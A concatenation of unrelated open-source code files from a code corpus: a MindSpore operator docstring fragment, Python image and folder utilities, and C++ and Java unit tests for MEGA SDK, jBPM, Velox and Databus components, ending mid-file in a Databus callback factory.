the pad length of output tensor, cum_sum_arr[shift_idx] is
the start to shift, and cum_sum_arr[shift_idx+1] is the end.
- **shift_idx** (Int) - The idx of cum_sum_arr.
if use python, PadAndShift is:
output = [-1] * cum_sum_arr[-1]
start = cum_sum_arr[shift_idx]
end = cum_sum_arr[shift_idx + 1]
output[start:end] = input_x[:(end-start)]
Outputs:
Tensor, has the same type as original `variable`.
Supported Platforms:
`CPU`
Examples:
>>> input_x = Tensor(np.array([9, 13, -1, -1, -1, -1, -1, -1]), mstype.int32)
>>> cum_sum_arr = Tensor(np.array([0, 3, 5]), mstype.int32)
>>> shift_idx = 1
>>> pad_and_shift = ops.PadAndShift()
>>> output = pad_and_shift(input_x, cum_sum_arr, shift_idx)
>>> print(output)
[-1, -1, -1, 9, 13]
"""
@prim_attr_register
def __init__(self):
self.init_prim_io_names(
inputs=['input_x', 'cum_sum_arr', 'shift_idx'], outputs=['output'])
def check_shape(self, input_x_shape, cum_sum_arr_shape, shift_idx_shape):
return input_x_shape
def check_dtype(self, input_x_dtype, cum_sum_arr_dtype, shift_idx_dtype):
return input_x_dtype
| 5,243 |
319 | <reponame>Hengle/face-nn<gh_stars>100-1000
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: penghuailiang
# @Date : 2019-09-27
import cv2
import os
import shutil
import numpy as np
import util.logit as log
from util.exception import NeuralException
def rm_dir(path):
"""
清空文件夹 包含子文件夹
:param path: 文件夹路径
"""
try:
if os.path.exists(path):
log.warn("rm directory %s", path)
shutil.rmtree(path)
else:
log.warn("not exist directory: %s", path)
except IOError as e:
log.error("io error, load imitator failed ", e)
def clear_folder(dir):
"""
清空文件夹 包含子文件夹
:param dir: 文件夹路径
"""
try:
if os.path.exists(dir):
for root, dirs, files in os.walk(dir, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
for name in dirs:
os.rmdir(os.path.join(root, name))
else:
log.warn("not exist directory: %s", dir)
except IOError as e:
log.error("io error, load imitator failed ", e)
def clear_files(dir):
"""
只清空文件 不清空子文件夹
如果文件夹不存在 则创建一个新的文件夹
:param dir: 文件夹路径
"""
try:
if os.path.exists(dir):
for root, dirs, files in os.walk(dir, topdown=False):
for name in files:
os.remove(os.path.join(root, name))
else:
log.warn("not exist directory: %s, create new", dir)
os.mkdir(dir)
except IOError as e:
log.error("io error, load imitator failed {0}".format(e))
def get_imit_cp(dir, ext=None):
"""
匹配查找最近生成的checkpoint
:param dir: search directory
:param ext: 文件后缀
"""
try:
m_time = 0
rst = None
for file in os.listdir(dir):
path = os.path.join(dir, file)
time = os.path.getmtime(path)
match = True
if ext is not None:
match = file.endswith(ext)
if match and (m_time == 0 or time > m_time):
m_time = time
rst = path
return rst
except IOError as e:
log.error('get_imit_cp, io error')
def generate_file(path, content):
"""
生成文件
:param path: file path
:param content: file content
:return:
"""
try:
dir = os.path.pardir(path)
if not os.path.exists(path):
os.mkdir(dir)
f = open(path, 'bw')
f.write(content)
f.close()
except IOError as e:
log.error("io error, load imitator failed {0}".format(e))
def to_gray(rgb):
"""
灰度处理
:param rgb: Tensor(RGB)
:return: Tensor(Gray)
"""
if len(rgb.shape) >= 3:
arr = np.mean(rgb, axis=2)
return arr[:, :, np.newaxis]
else:
raise NeuralException("to gray error")
def fill_gray(image):
"""
[W, H, 1] -> [W, H, 3] or [W, H]->[W, H, 3]
:param image: input image
:return: transfer image
"""
shape = image.shape
if len(shape) == 2:
image = image[:, :, np.newaxis]
shape = image.shape
if shape[2] == 1:
return np.pad(image, ((0, 0), (0, 0), (1, 1)), 'edge')
elif shape[2] == 3:
return np.mean(image, axis=2)
return image
def tensor_2_image(tensor):
"""
将tensor转numpy array 给cv2使用
:param tensor: [batch, c, w, h]
:return: [batch, h, w, c]
"""
batch = tensor.size(0)
images = []
for i in range(batch):
img = tensor[i].cpu().detach().numpy()
img = np.swapaxes(img, 0, 2) # [h, w, c]
img = np.swapaxes(img, 0, 1) # [w, h, c]
images.append(img * 255)
return images
def save_img(path, tensor1, tensor2):
"""
save first image of batch to disk
:param path: save path
:param tensor1: shape: [Batch, C, W, H)
:param tensor2: shape: [Batch, C, W, H)
"""
image1 = tensor_2_image(tensor1)
image2 = tensor_2_image(tensor2)
if len(image1) > 1:
img = merge_4image(image1[0], image2[0], image1[1], image2[1])
elif len(image1) > 0:
img = merge_image(image1[0], image2[0], mode='h')
else:
raise NeuralException("tensor error")
cv2.imwrite(path, img)
def merge_image(image1, image2, mode="h", size=512, show=False, transpose=True):
"""
拼接图片
:param image1: numpy array
:param image2: numpy array
:param mode: 'h': 横向拼接 'v': 纵向拼接
:param size: 输出分辨率
:param show: 窗口显示
:param transpose: 转置长和宽 cv2顺序[H, W, C]
:return: numpy array
"""
size_ = (int(size / 2), int(size / 2))
img1_ = cv2.resize(image1, size_)
img2_ = cv2.resize(image2, size_)
if mode == 'h':
image = np.append(img1_, img2_, axis=1) # (256, 512, 3)
elif mode == 'v':
image = np.append(img1_, img2_, axis=0)
else:
log.warn("not implements mode: %s".format(mode))
return
if transpose:
image = image.swapaxes(0, 1)
if show:
cv2.imshow("contact", image)
cv2.waitKey()
cv2.destroyAllWindows()
return image
def merge_4image(image1, image2, image3, image4, size=512, show=False, transpose=True):
"""
拼接图片
:param image1: input image1, numpy array
:param image2: input image2, numpy array
:param image3: input image3, numpy array
:param image4: input image4, numpy array
:param size: 输出分辨率
:param show: 窗口显示
:param transpose: 转置长和宽 cv2顺序[H, W, C]
:return: merged image
"""
size_ = (int(size / 2), int(size / 2))
img_1 = cv2.resize(image1, size_)
img_2 = cv2.resize(image2, size_)
img_3 = cv2.resize(image3, size_)
img_4 = cv2.resize(image4, size_)
image1_ = np.append(img_1, img_2, axis=1)
image2_ = np.append(img_3, img_4, axis=1)
image = np.append(image1_, image2_, axis=0)
if transpose:
image = image.swapaxes(0, 1)
if show:
cv2.imshow("contact", image)
cv2.waitKey()
cv2.destroyAllWindows()
return image
| 3,243 |
1,296 | /**
* (c) 2019 by Mega Limited, Wellsford, New Zealand
*
* This file is part of the MEGA SDK - Client Access Engine.
*
* Applications using the MEGA API must present a valid application key
* and comply with the the rules set forth in the Terms of Service.
*
* The MEGA SDK is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
*
* @copyright Simplified (2-clause) BSD License.
*
* You should have received a copy of the license along with this
* program.
*/
#include <gtest/gtest.h>
#include <mega/share.h>
void checkNewShares(const mega::NewShare& exp, const mega::NewShare& act)
{
ASSERT_EQ(exp.h, act.h);
ASSERT_EQ(exp.outgoing, act.outgoing);
ASSERT_EQ(exp.peer, act.peer);
ASSERT_EQ(exp.access, act.access);
ASSERT_EQ(exp.ts, act.ts);
ASSERT_TRUE(std::equal(exp.key, exp.key + mega::SymmCipher::BLOCKSIZE, act.key));
ASSERT_EQ(exp.have_key, act.have_key);
ASSERT_EQ(exp.have_auth, act.have_auth);
ASSERT_EQ(exp.pending, act.pending);
}
TEST(Share, serialize_unserialize)
{
mega::User user;
user.userhandle = 42;
mega::PendingContactRequest pcr{123};
mega::Share share{&user, mega::RDONLY, 13, &pcr};
std::string d;
share.serialize(&d);
mega::byte key[mega::SymmCipher::BLOCKSIZE];
std::fill(key, key + mega::SymmCipher::BLOCKSIZE, 'X');
auto data = d.c_str();
auto newShare = std::unique_ptr<mega::NewShare>{mega::Share::unserialize(-1, 100, key, &data, d.data() + d.size())};
const mega::NewShare expectedNewShare{100, -1, user.userhandle, mega::RDONLY, 13, key, NULL, 123};
checkNewShares(expectedNewShare, *newShare);
}
TEST(Share, unserialize_32bit)
{
// This is the result of serialization on 32bit Windows
const std::array<char, 26> rawData = {
0x2a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x7b, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00
};
const std::string d(rawData.data(), rawData.size());
mega::byte key[mega::SymmCipher::BLOCKSIZE];
std::fill(key, key + mega::SymmCipher::BLOCKSIZE, 'X');
auto data = d.c_str();
auto newShare = std::unique_ptr<mega::NewShare>{mega::Share::unserialize(-1, 100, key, &data, d.data() + d.size())};
const mega::NewShare expectedNewShare{100, -1, 42, mega::RDONLY, 13, key, NULL, 123};
checkNewShares(expectedNewShare, *newShare);
}
| 1,021 |
841 | <reponame>omolinab/jbpm
/*
* Copyright 2018 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jbpm.casemgmt.impl;
import static org.assertj.core.api.Assertions.assertThat;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Date;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import org.jbpm.casemgmt.api.model.instance.CaseFileInstance;
import org.jbpm.casemgmt.api.model.instance.CaseStageInstance;
import org.jbpm.casemgmt.demo.enrichment.DocumentType;
import org.jbpm.casemgmt.impl.util.AbstractCaseServicesBaseTest;
import org.jbpm.document.service.impl.DocumentImpl;
import org.junit.Test;
import org.kie.api.runtime.query.QueryContext;
import org.kie.api.task.model.TaskSummary;
import org.kie.internal.query.QueryFilter;
public class AdHocConditionsTest extends AbstractCaseServicesBaseTest {
private static final String ENRICHMENT_PROC_ID = "src.enrichment-case";
@Override
protected List<String> getProcessDefinitionFiles() {
List<String> processes = new ArrayList<String>();
processes.add("org/jbpm/casemgmt/demo/enrichment/enrichment-case.bpmn2");
processes.add("org/jbpm/casemgmt/demo/enrichment/init.drl");
return processes;
}
@Test
public void testEnrichmentFlowNotValidManuallyApproved() throws Exception {
Map<String, Object> data = new HashMap<>();
CaseFileInstance caseFile = caseService.newCaseFileInstance(deploymentUnit.getIdentifier(), ENRICHMENT_PROC_ID, data);
String caseId = caseService.startCase(deploymentUnit.getIdentifier(), ENRICHMENT_PROC_ID, caseFile);
assertThat(caseId).isNotNull().isEqualTo(FIRST_CASE_ID);
assertCaseInstanceActive(caseId);
Collection<CaseStageInstance> activeStages = caseRuntimeDataService.getCaseInstanceStages(caseId, true, new QueryContext());
assertThat(activeStages).hasSize(3);
identityProvider.setRoles(Arrays.asList("HR"));
List<TaskSummary> tasks = runtimeDataService.getTasksAssignedAsPotentialOwner("john", new QueryFilter());
assertThat(tasks).hasSize(4);
Map<String, TaskSummary> mappedTasks = mapTaskSummaries(tasks);
assertThat(mappedTasks).containsKeys("Additional Client Details",
"Upload Document jbpm",
"Upload Document enablement",
"Upload Document test");
TaskSummary task1 = tasks.stream().filter(task -> task.getName().equals("Upload Document test")).findAny().get();
Map<String, Object> results = new HashMap<>();
DocumentImpl document = new DocumentImpl("test", 10l, new Date());
document.setContent("test".getBytes());
results.put("uploadedDoc", document);
userTaskService.completeAutoProgress(task1.getId(), "john", results);
tasks = runtimeDataService.getTasksAssignedAsPotentialOwner("john", new QueryFilter());
assertThat(tasks).hasSize(4);
mappedTasks = mapTaskSummaries(tasks);
assertThat(mappedTasks).containsKeys("Additional Client Details",
"Upload Document jbpm",
"Upload Document enablement",
"Manual Approval for test");
task1 = tasks.stream().filter(task -> task.getName().equals("Manual Approval for test")).findAny().get();
Map<String, Object> inputs = userTaskService.getTaskInputContentByTaskId(task1.getId());
assertThat(inputs).containsKeys("documentFile", "documentType");
assertThat(inputs.get("documentFile")).isNotNull();
assertThat(inputs.get("documentType")).isNotNull();
assertThat(inputs.get("documentFile")).isInstanceOf(DocumentImpl.class);
assertThat(inputs.get("documentType")).isInstanceOf(DocumentType.class);
assertThat(inputs.get("documentFile")).hasFieldOrPropertyWithValue("name", "test");
assertThat(inputs.get("documentType")).hasFieldOrPropertyWithValue("name", "test");
results = new HashMap<>();
DocumentType documentType = new DocumentType("test", true, true, "txt", false);
results.put("decided", documentType);
userTaskService.completeAutoProgress(task1.getId(), "john", results);
activeStages = caseRuntimeDataService.getCaseInstanceStages(caseId, true, new QueryContext());
assertThat(activeStages).hasSize(2);
caseService.destroyCase(caseId);
}
@Test
public void testEnrichmentFlowNotValidManuallyRejected() throws Exception {
Map<String, Object> data = new HashMap<>();
CaseFileInstance caseFile = caseService.newCaseFileInstance(deploymentUnit.getIdentifier(), ENRICHMENT_PROC_ID, data);
String caseId = caseService.startCase(deploymentUnit.getIdentifier(), ENRICHMENT_PROC_ID, caseFile);
assertThat(caseId).isNotNull().isEqualTo(FIRST_CASE_ID);
assertCaseInstanceActive(caseId);
Collection<CaseStageInstance> activeStages = caseRuntimeDataService.getCaseInstanceStages(caseId, true, new QueryContext());
assertThat(activeStages).hasSize(3);
identityProvider.setRoles(Arrays.asList("HR"));
List<TaskSummary> tasks = runtimeDataService.getTasksAssignedAsPotentialOwner("john", new QueryFilter());
assertThat(tasks).hasSize(4);
Map<String, TaskSummary> mappedTasks = mapTaskSummaries(tasks);
assertThat(mappedTasks).containsKeys("Additional Client Details",
"Upload Document jbpm",
"Upload Document enablement",
"Upload Document test");
TaskSummary task1 = tasks.stream().filter(task -> task.getName().equals("Upload Document test")).findAny().get();
Map<String, Object> results = new HashMap<>();
DocumentImpl document = new DocumentImpl("test", 10l, new Date());
document.setContent("test".getBytes());
results.put("uploadedDoc", document);
userTaskService.completeAutoProgress(task1.getId(), "john", results);
tasks = runtimeDataService.getTasksAssignedAsPotentialOwner("john", new QueryFilter());
assertThat(tasks).hasSize(4);
mappedTasks = mapTaskSummaries(tasks);
assertThat(mappedTasks).containsKeys("Additional Client Details",
"Upload Document jbpm",
"Upload Document enablement",
"Manual Approval for test");
task1 = tasks.stream().filter(task -> task.getName().equals("Manual Approval for test")).findAny().get();
results = new HashMap<>();
DocumentType documentType = new DocumentType("test", true, false, "txt", true);
results.put("decided", documentType);
userTaskService.completeAutoProgress(task1.getId(), "john", results);
tasks = runtimeDataService.getTasksAssignedAsPotentialOwner("john", new QueryFilter());
assertThat(tasks).hasSize(4);
mappedTasks = mapTaskSummaries(tasks);
assertThat(mappedTasks).containsKeys("Additional Client Details",
"Upload Document jbpm",
"Upload Document enablement",
"Upload Document test");
activeStages = caseRuntimeDataService.getCaseInstanceStages(caseId, true, new QueryContext());
assertThat(activeStages).hasSize(3);
caseService.destroyCase(caseId);
}
@Test
public void testEnrichmentFlowNotValidDirectlyRejected() throws Exception {
Map<String, Object> data = new HashMap<>();
CaseFileInstance caseFile = caseService.newCaseFileInstance(deploymentUnit.getIdentifier(), ENRICHMENT_PROC_ID, data);
String caseId = caseService.startCase(deploymentUnit.getIdentifier(), ENRICHMENT_PROC_ID, caseFile);
assertThat(caseId).isNotNull().isEqualTo(FIRST_CASE_ID);
assertCaseInstanceActive(caseId);
Collection<CaseStageInstance> activeStages = caseRuntimeDataService.getCaseInstanceStages(caseId, true, new QueryContext());
assertThat(activeStages).hasSize(3);
List<TaskSummary> tasks = runtimeDataService.getTasksAssignedAsPotentialOwner("john", new QueryFilter());
assertThat(tasks).hasSize(4);
Map<String, TaskSummary> mappedTasks = mapTaskSummaries(tasks);
assertThat(mappedTasks).containsKeys("Additional Client Details",
"Upload Document jbpm",
"Upload Document enablement",
"Upload Document test");
TaskSummary task1 = tasks.stream().filter(task -> task.getName().equals("Upload Document enablement")).findAny().get();
Map<String, Object> results = new HashMap<>();
DocumentImpl document = new DocumentImpl("enablement", 10l, new Date());
document.setContent("enablement".getBytes());
results.put("uploadedDoc", document);
userTaskService.completeAutoProgress(task1.getId(), "john", results);
tasks = runtimeDataService.getTasksAssignedAsPotentialOwner("john", new QueryFilter());
assertThat(tasks).hasSize(4);
mappedTasks = mapTaskSummaries(tasks);
assertThat(mappedTasks).containsKeys("Additional Client Details",
"Upload Document jbpm",
"Upload Document enablement",
"Upload Document test");
activeStages = caseRuntimeDataService.getCaseInstanceStages(caseId, true, new QueryContext());
assertThat(activeStages).hasSize(3);
caseService.destroyCase(caseId);
}
@Test
public void testEnrichmentFlowNotValidDirectlyApproved() throws Exception {
Map<String, Object> data = new HashMap<>();
CaseFileInstance caseFile = caseService.newCaseFileInstance(deploymentUnit.getIdentifier(), ENRICHMENT_PROC_ID, data);
String caseId = caseService.startCase(deploymentUnit.getIdentifier(), ENRICHMENT_PROC_ID, caseFile);
assertThat(caseId).isNotNull().isEqualTo(FIRST_CASE_ID);
assertCaseInstanceActive(caseId);
Collection<CaseStageInstance> activeStages = caseRuntimeDataService.getCaseInstanceStages(caseId, true, new QueryContext());
assertThat(activeStages).hasSize(3);
List<TaskSummary> tasks = runtimeDataService.getTasksAssignedAsPotentialOwner("john", new QueryFilter());
assertThat(tasks).hasSize(4);
Map<String, TaskSummary> mappedTasks = mapTaskSummaries(tasks);
assertThat(mappedTasks).containsKeys("Additional Client Details",
"Upload Document jbpm",
"Upload Document enablement",
"Upload Document test");
TaskSummary task1 = tasks.stream().filter(task -> task.getName().equals("Upload Document jbpm")).findAny().get();
Map<String, Object> results = new HashMap<>();
DocumentImpl document = new DocumentImpl("jbpm", 10l, new Date());
document.setContent("jbpm".getBytes());
results.put("uploadedDoc", document);
userTaskService.completeAutoProgress(task1.getId(), "john", results);
tasks = runtimeDataService.getTasksAssignedAsPotentialOwner("john", new QueryFilter());
assertThat(tasks).hasSize(3);
mappedTasks = mapTaskSummaries(tasks);
assertThat(mappedTasks).containsKeys("Additional Client Details",
"Upload Document enablement",
"Upload Document test");
activeStages = caseRuntimeDataService.getCaseInstanceStages(caseId, true, new QueryContext());
assertThat(activeStages).hasSize(2);
caseService.destroyCase(caseId);
}
}
| 5,825 |
672 | <filename>velox/common/tests/AsyncSourceTest.cpp
/*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include "velox/common/base/AsyncSource.h"
#include <fmt/format.h>
#include <folly/Random.h>
#include <folly/Synchronized.h>
#include <gtest/gtest.h>
#include <thread>
using namespace facebook::velox;
// A sample class to be constructed via AsyncSource.
struct Gizmo {
explicit Gizmo(int32_t _id) : id(_id) {}
const int32_t id;
};
TEST(AsyncSourceTest, basic) {
AsyncSource<Gizmo> gizmo([]() { return std::make_unique<Gizmo>(11); });
EXPECT_FALSE(gizmo.hasValue());
gizmo.prepare();
EXPECT_TRUE(gizmo.hasValue());
auto value = gizmo.move();
EXPECT_FALSE(gizmo.hasValue());
EXPECT_EQ(11, value->id);
}
TEST(AsyncSourceTest, threads) {
constexpr int32_t kNumThreads = 10;
constexpr int32_t kNumGizmos = 2000;
folly::Synchronized<std::unordered_set<int32_t>> results;
std::vector<std::shared_ptr<AsyncSource<Gizmo>>> gizmos;
for (auto i = 0; i < kNumGizmos; ++i) {
gizmos.push_back(std::make_shared<AsyncSource<Gizmo>>([i]() {
std::this_thread::sleep_for(std::chrono::milliseconds(1)); // NOLINT
return std::make_unique<Gizmo>(i);
}));
}
std::vector<std::thread> threads;
threads.reserve(kNumThreads);
for (int32_t threadIndex = 0; threadIndex < kNumThreads; ++threadIndex) {
threads.push_back(std::thread([threadIndex, &gizmos, &results]() {
if (threadIndex < kNumThreads / 2) {
// The first half of the threads prepare Gizmos in the background.
for (auto i = 0; i < kNumGizmos; ++i) {
gizmos[i]->prepare();
}
} else {
// The rest of the threads first get random Gizmos and then do a pass
// over all the Gizmos to make sure all get collected. We assert that
// each Gizmo is obtained once.
folly::Random::DefaultGenerator rng;
for (auto i = 0; i < kNumGizmos / 3; ++i) {
auto gizmo =
gizmos[folly::Random::rand32(rng) % gizmos.size()]->move();
if (gizmo) {
results.withWLock([&](auto& set) {
EXPECT_TRUE(set.find(gizmo->id) == set.end());
set.insert(gizmo->id);
});
}
}
for (auto i = 0; i < gizmos.size(); ++i) {
auto gizmo = gizmos[i]->move();
if (gizmo) {
results.withWLock([&](auto& set) {
EXPECT_TRUE(set.find(gizmo->id) == set.end());
set.insert(gizmo->id);
});
}
}
}
}));
}
for (auto& thread : threads) {
thread.join();
}
results.withRLock([&](auto& set) {
for (auto i = 0; i < kNumGizmos; ++i) {
EXPECT_TRUE(set.find(i) != set.end());
}
});
}
| 1,409 |
2,989 | package com.linkedin.databus.client.consumer;
/*
*
* Copyright 2013 LinkedIn Corp. All rights reserved
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*
*/
import org.apache.avro.Schema;
import com.linkedin.databus.client.pub.ConsumerCallbackResult;
import com.linkedin.databus.client.pub.DatabusCombinedConsumer;
import com.linkedin.databus.client.pub.DbusEventDecoder;
import com.linkedin.databus.client.pub.SCN;
import com.linkedin.databus.client.pub.mbean.ConsumerCallbackStats;
import com.linkedin.databus.client.pub.mbean.UnifiedClientStats;
import com.linkedin.databus.core.DbusConstants;
import com.linkedin.databus.core.DbusEvent;
import com.linkedin.databus.core.DbusEventInternalWritable;
/**
* A factory for bootstrap-consumer callbacks.
*/
public class BootstrapConsumerCallbackFactory implements ConsumerCallbackFactory<DatabusCombinedConsumer>
{
protected final ConsumerCallbackStats _consumerStats;
protected final UnifiedClientStats _unifiedClientStats;
public BootstrapConsumerCallbackFactory(ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
public ConsumerCallable<ConsumerCallbackResult> createCheckpointCallable(long currentNanos,
SCN scn,
DatabusCombinedConsumer consumer,
boolean updateStats)
{
if (updateStats) {
return new BootstrapCheckpointCallable(currentNanos, scn, consumer, _consumerStats, _unifiedClientStats);
} else {
return new BootstrapCheckpointCallable(currentNanos, scn, consumer, null, null);
}
}
@Override
public ConsumerCallable<ConsumerCallbackResult> createDataEventCallable(long currentNanos,
DbusEvent e,
DbusEventDecoder eventDecoder,
DatabusCombinedConsumer consumer,
boolean updateStats)
{
if (updateStats) {
return new BootstrapDataEventCallable(currentNanos, e, eventDecoder, consumer, _consumerStats, _unifiedClientStats);
} else {
return new BootstrapDataEventCallable(currentNanos, e, eventDecoder, consumer, null, null);
}
}
@Override
public ConsumerCallable<ConsumerCallbackResult> createEndConsumptionCallable(long currentNanos,
DatabusCombinedConsumer consumer,
boolean updateStats)
{
if (updateStats) {
return new StopBootstrapCallable(currentNanos, consumer, _consumerStats, _unifiedClientStats);
} else {
return new StopBootstrapCallable(currentNanos, consumer, null, null);
}
}
@Override
public ConsumerCallable<ConsumerCallbackResult> createEndDataEventSequenceCallable(long currentNanos,
SCN scn,
DatabusCombinedConsumer consumer,
boolean updateStats)
{
if (updateStats) {
return new EndBootstrapEventSequenceCallable(currentNanos, scn, consumer, _consumerStats, _unifiedClientStats);
} else {
return new EndBootstrapEventSequenceCallable(currentNanos, scn, consumer, null, null);
}
}
@Override
public ConsumerCallable<ConsumerCallbackResult> createEndSourceCallable(long currentNanos,
String source,
Schema sourceSchema,
DatabusCombinedConsumer consumer,
boolean updateStats)
{
if (updateStats) {
return new EndBootstrapSourceCallable(currentNanos, source, sourceSchema, consumer, _consumerStats, _unifiedClientStats);
} else {
return new EndBootstrapSourceCallable(currentNanos, source, sourceSchema, consumer, null, null);
}
}
@Override
public ConsumerCallable<ConsumerCallbackResult> createRollbackCallable(long currentNanos,
SCN scn,
DatabusCombinedConsumer consumer,
boolean updateStats)
{
if (updateStats) {
return new BootstrapRollbackCallable(currentNanos, scn, consumer, _consumerStats, _unifiedClientStats);
} else {
return new BootstrapRollbackCallable(currentNanos, scn, consumer, null, null);
}
}
@Override
public ConsumerCallable<ConsumerCallbackResult> createStartConsumptionCallable(long currentNanos,
DatabusCombinedConsumer consumer,
boolean updateStats)
{
if (updateStats) {
return new StartBootstrapCallable(currentNanos, consumer, _consumerStats, _unifiedClientStats);
} else {
return new StartBootstrapCallable(currentNanos, consumer, null, null);
}
}
@Override
public ConsumerCallable<ConsumerCallbackResult> createStartDataEventSequenceCallable(long currentNanos,
SCN scn,
DatabusCombinedConsumer consumer,
boolean updateStats)
{
if (updateStats) {
return new StartBootstrapEventSequenceCallable(currentNanos, scn, consumer, _consumerStats, _unifiedClientStats);
} else {
return new StartBootstrapEventSequenceCallable(currentNanos, scn, consumer, null, null);
}
}
@Override
public ConsumerCallable<ConsumerCallbackResult> createStartSourceCallable(long currentNanos,
String source,
Schema sourceSchema,
DatabusCombinedConsumer consumer,
boolean updateStats)
{
if (updateStats) {
return new StartBootstrapSourceCallable(currentNanos, source, sourceSchema, consumer, _consumerStats, _unifiedClientStats);
} else {
return new StartBootstrapSourceCallable(currentNanos, source, sourceSchema, consumer, null, null);
}
}
@Override
public ConsumerCallable<ConsumerCallbackResult> createOnErrorCallable(long currentNanos,
Throwable err,
DatabusCombinedConsumer consumer,
boolean updateStats)
{
if (updateStats) {
return new OnBootstrapErrorCallable(currentNanos, err, consumer, _consumerStats, _unifiedClientStats);
} else {
return new OnBootstrapErrorCallable(currentNanos, err, consumer, null, null);
}
}
}
class OnBootstrapErrorCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final Throwable _err;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public OnBootstrapErrorCallable(long currentNanos, Throwable err,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_err = err;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onBootstrapError(_err);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class BootstrapCheckpointCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final SCN _scn;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public BootstrapCheckpointCallable(long currentNanos,
SCN scn,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
_scn = scn;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
ConsumerCallbackResult res = _consumer.onBootstrapCheckpoint(_scn);
return ConsumerCallbackResult.isFailure(res) ? ConsumerCallbackResult.SKIP_CHECKPOINT : res;
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerErrorEventsProcessed(1);
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
long nanoRunTime = getNanoRunTime();
if (_consumerStats != null)
{
long totalTime = (nanoRunTime + getNanoTimeInQueue()) / DbusConstants.NUM_NSECS_IN_MSEC;
_consumerStats.registerEventsProcessed(1, totalTime);
}
if (_unifiedClientStats != null)
{
_unifiedClientStats.registerCallbacksProcessed(nanoRunTime);
}
}
}
}
class BootstrapDataEventCallable extends ConsumerCallable<ConsumerCallbackResult>
{
private final DbusEvent _event;
private final DbusEventDecoder _eventDecoder;
private final DatabusCombinedConsumer _consumer;
private final ConsumerCallbackStats _consumerStats;
private final UnifiedClientStats _unifiedClientStats;
public BootstrapDataEventCallable(long currentNanos,
DbusEvent e,
DbusEventDecoder eventDecoder,
DatabusCombinedConsumer consumer)
{
this(currentNanos, e, eventDecoder, consumer, null, null);
}
public BootstrapDataEventCallable(long currentNanos,
DbusEvent e,
DbusEventDecoder eventDecoder,
DatabusCombinedConsumer consumer,
ConsumerCallbackStats consumerStats,
UnifiedClientStats unifiedClientStats)
{
super(currentNanos);
if (!(e instanceof DbusEventInternalWritable)) {
throw new UnsupportedClassVersionError("Cannot support cloning on non-DbusEvent");
}
_event = ((DbusEventInternalWritable)e).clone(null);
_eventDecoder = eventDecoder;
_consumer = consumer;
_consumerStats = consumerStats;
_unifiedClientStats = unifiedClientStats;
}
@Override
protected ConsumerCallbackResult doCall() throws Exception
{
return _consumer.onBootstrapEvent(_event, _eventDecoder);
}
@Override
protected void doEndCall(ConsumerCallbackResult result)
{
if (result==ConsumerCallbackResult.ERROR || result==ConsumerCallbackResult.ERROR_FATAL)
{
if (_consumerStats != null) _consumerStats.registerDataErrorsProcessed();
if (_unifiedClientStats != null) _unifiedClientStats.registerCallbackError();
}
else
{
